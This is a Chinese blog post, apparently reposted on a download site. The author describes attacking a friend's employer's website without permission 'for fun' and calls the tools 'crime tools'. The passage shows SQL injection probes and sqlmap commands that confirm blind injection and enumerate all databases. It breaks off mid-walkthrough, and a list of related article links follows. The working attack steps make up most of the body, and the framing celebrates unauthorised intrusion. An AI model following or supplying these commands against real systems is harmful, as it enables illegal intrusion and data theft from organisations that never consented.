最近在研究Web安全相關的知識，特別是SQL注入類的相關知識。接觸了一些與SQL注入相關的工具。周末在家閑著無聊，想把平時學的東東結合起來攻擊一下身邊某個小伙伴去的公司，看看能不能得逞。不試不知道，一試還真TM得逞了，內心有些小激動，特在此寫博文一篇，來記錄下我是如何一步步攻破這家互聯網公司的。
　　【作案工具介紹】
　?。?） AppScan滲透掃描工具
　　Appscan是Web應用程序滲透測試舞臺上使用最廣泛的工具之一。它是一個桌面應用程序，它有助于專業安全人員進行Web應用程序自動化脆弱性評估。
　?。?） Sqlmap滲透測試工具
　　Sqlmap是一個自動化的SQL注入工具，其主要功能是掃描，發現并利用給定的URL的SQL注入漏洞。
　　【作案細節如下】
　　首先使用Appscan工具，對www.xxx.com互聯網公司的官網進行掃描，掃描結果如下：
　　
　　在這56個安全性問題中，找到你感興趣的鏈接，例如下面這條：
　　http://www.xxx.com/system/cms/show？id=1
　　為何要挑出這一條呢？因為它對于SQL注入比較典型，下面普及下SQL注入常用手法。首先用如下語句，確定該網站是否存在注入點：
　　http://192.168.16.128/news.php？id=1原網站
　　http://192.168.16.128/news.php？id=1’ 出錯或顯示不正常
　　http://192.168.16.128/news.php？id=1and 1=1 出錯或顯示不正常
　　http://192.168.16.128/news.php？id=1and 1=2 出錯或顯示不正常
　　如果有出錯，說明存在注入點。
　　在判斷完http://www.xxx.com/system/cms/show？id=1該鏈接存在注入點后，接下來就啟動我們的滲透測試工具Sqlmap，進行下一步的注入工作，詳細過程如下：
　　1） 再次確認目標注入點是否可用：
　　python sqlmap.py -u http://www.xxx.com/system/cms/show？id=1
　　參數：
　　-u：指定注入點url
　　結果：
　　
　　注入結果展示：
　　a. 參數id存在基于布爾的盲注，即可以根據返回頁面判斷條件真假的注入。
　　b. 參數id存在基于時間的盲注，即不能根據頁面返回內容判斷任何信息，用條件語句查看時間延遲語句是否執行（即頁面返回時間是否增加）來判斷。
　　c. 數據庫類型為：MySql 5.0.12
　　2） 暴庫所有數據庫：
　　一條命令即可曝出該sqlserver中所有數據庫名稱，命令如下：
　　python sqlmap.py -u http://www.xxx.com/system/cms/show？id=1–dbs
　　參數：
　　–dbs：dbs前面有兩條杠，列出所有數據庫。

普通下載普通下載

相關電子資料下載

• 常用于緩存處理的機制總結 如何避免緩存雪崩問題？ 24
• SpringBoot物理線程、虛擬線程、Webflux性能比較 37
• mysql經典面試題及答案 63
• 人大金倉獲評“2023年度軟件和信息技術服務名牌企業” 100
• 聊聊即將到來的MySQL5.7停服事件 179
• 基于Prometheus開源的完整監控解決方案 25
• 事務性日志結構文件系統的設計及實現 58
• SQL關系數據庫和實時數據庫的區別 62
• 什么是SQL注入？Java項目防止SQL注入方式 37
• 基于控制臺的通訊錄管理系統功能介紹 59